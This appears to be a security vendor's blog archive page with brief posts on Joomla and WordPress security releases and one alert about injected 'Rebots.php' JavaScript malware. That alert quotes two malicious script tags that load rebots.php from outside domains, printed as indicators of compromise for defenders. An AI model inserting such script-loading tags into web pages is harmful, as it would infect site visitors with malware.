Joomla Version 2.5.10 Released – Security Updates

April 24, 2013 by Leave a Comment

This morning the Joomla development team released a new version of the Joomla platform. This is a Security release, so please be sure to update if you’re on the 2.x branch. If you’re on the 1.x branch the odds of updating seamlessly is highly unlikely so please do so only if you’re engaging a developer to assist you.

This release address 7 security issues, all of them appear to be low to moderate and revolve around Cross-Site Scripting (XSS), Denial of Service (DOS) and Privilege Escalation. It also contains another 38 bug fixes.

Security Fixes include:

If you can, please be sure to update, you can get your latest releases off the Joomla website here.

Filed Under: awareness, joomla, sucuri, updates Tagged With: , , ,

WordPress 3.5 Released

December 11, 2012 by 1 Comment

Update like it’s hot!

Today marks the release of WordPress 3.5 (Named Elvin after jazz drimmer Elvin Jones), a major release this year for the WordPress project.

WordPress 3.5

This release highlights some very significant changes to anything from the JavaScript libraries being used, to a brand new Media Manager. Although there are no security fixes highlighted, there were various bugs fixed along with the newly added features.


Read More

Filed Under: security, sucuri, updates, WordPress Tagged With: , , ,

Rebots.php JavaScript Malware Being Actively Injected

August 24, 2012 by 7 Comments

Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, it has increased its appearances, and has variated the way it’s being included on the infected sites.

Rebots

When you visit a compromised site, it will attempt to load an additional JavaScript, like one of these:

<script src="http://lig-limp.com.br/rebots.php"..

<script; src="http://chezbruna.com.br/imagens/rebots.php"..


Read More

Filed Under: javascript, Malware, SiteCheck, sucuri, updates, WordPress Tagged With: , , , ,

Joomla 2.5.5 released (security update)

June 18, 2012 by Leave a Comment

Joomla 2.5.5 was just released today, with a few bugs fixed and 2 important security updates for a privilege escalation and an information disclosure issue:

1- Privilege escalation

High severity security issue, that allows unprivileged users to get admin access to a site running Joomla.

2- Information Disclosure

This is a low severity security issue that leaks internal information about the database, internal paths and PHP info.

More information about this release here: Joomla 2.5.5 released

Remember, the leading cause for web site compromises is outdated software! So as a web site owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sitecheck was also updated to alert users not running version 2.5.5 on their Joomla sites.

Filed Under: joomla, security, updates, vulnerability Tagged With: , , ,

WordPress Security Release – Upgrade to 3.3.2 TODAY

April 20, 2012 by 10 Comments

It’s that time again, to upgrade all your WordPress installs. This morning the core team released WordPress 3.3.2 which includes security updates for three external libraries:

  • Plupload (version 1.5.4), which WordPress uses for uploading media.
  • SWFUpload, which WordPress previously used for uploading media, and may still be in use by plugins.
  • SWFObject, which WordPress previously used to embed Flash content, and may still be in use by plugins and themes.

Here are a few other bugs addressed in WordPress 3.3.2:

  • Limited privilege escalation where a site administrator could deactivate network-wide plugins when running a WordPress network under particular circumstances, disclosed by Jon Cave of our WordPress core security team, and Adam Backstrom.
  • Cross-site scripting vulnerability when making URLs clickable, by Jon Cave.
  • Cross-site scripting vulnerabilities in redirects after posting comments in older browsers, and when filtering URLs. Thanks to Mauro Gentile for responsibly disclosing these issues to the security team.

Here is the official WordPress News release on WordPress.org.

So do it, go upgrade to WordPress 3.3.2 today!

If you have questions about your site security email Sucuri Info. Make sure to run a free malware scan with Sucuri SiteCheck.

Filed Under: security, updates, WordPress Tagged With: , , ,

Joomla updates (1.5.26 and 2.5.4)

April 6, 2012 by 2 Comments

If you are using Joomla, now is a good time to check if your sites are updated. Some (high severity) vulnerabilities were fixed in the latest release, especially if you are still on the 1.5.x branch.

For 1.5.26:

High Priority – Core – Password Change Vulnerability.
Low Priority – Core – Information Disclosure.

For 2.5.4:

Low Priority – Core – Information Disclosure.
Low Priority – Core – XSS Vulnerability.

Version 2.5.3 (released 2 weeks ago) also contains multiple security fixes, so if you haven’t updated your sites lately, you better check them asap.

More details on their release notes for 1.5.26 and for 2.5.4.

*Remember, the leading cause for web site compromises is outdated software! So as a web site owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Filed Under: joomla, updates Tagged With: ,